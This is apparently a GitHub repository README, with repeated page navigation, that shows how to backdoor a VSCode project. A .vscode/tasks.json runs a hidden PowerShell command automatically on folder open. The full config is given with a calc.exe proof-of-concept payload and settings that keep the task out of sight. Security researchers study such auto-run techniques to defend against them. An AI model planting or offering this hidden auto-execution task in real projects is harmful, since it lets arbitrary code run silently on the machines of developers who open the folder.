VSCode-Backdoor

🐚 Backdooring a VSCode Project via `.vscode/tasks.json`

VSCode allows automatic task execution via the tasks.json file. By abusing this, an attacker can introduce a stealthy backdoor that executes arbitrary code when the folder is opened in VSCode.

🔧 Technique Overview

Create a .vscode/ directory in the root of the project (if it doesn't already exist).
Add a tasks.json file with the following content.

Example: Running Calculator

This example runs a hidden PowerShell command to start calc.exe when the folder is opened in VSCode.

{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "VS",
      "type": "shell",
      "command": "powershell",
      "args": [
        "-WindowStyle", "Hidden",
        "-Command",
        "Start-Process calc.exe"
      ],
      "problemMatcher": [],
      "group": {
        "kind": "build",
        "isDefault": true
      },
      "runOptions": {
        "runOn": "folderOpen"
      },
      "presentation": {
        "echo": false,
        "reveal": "never",
        "focus": false,
        "panel": "dedicated"
      }
    }
  ]
}

Demo Video :

VSCodeBackDoor.mp4

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

VSCode-Backdoor

🐚 Backdooring a VSCode Project via `.vscode/tasks.json`

🔧 Technique Overview

Example: Running Calculator

Demo Video :

About

Uh oh!

Releases

Packages

SaadAhla/VSCode-Backdoor

Folders and files

Latest commit

History

Repository files navigation

VSCode-Backdoor

🐚 Backdooring a VSCode Project via .vscode/tasks.json

🔧 Technique Overview

Example: Running Calculator

Demo Video :

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

🐚 Backdooring a VSCode Project via `.vscode/tasks.json`

Packages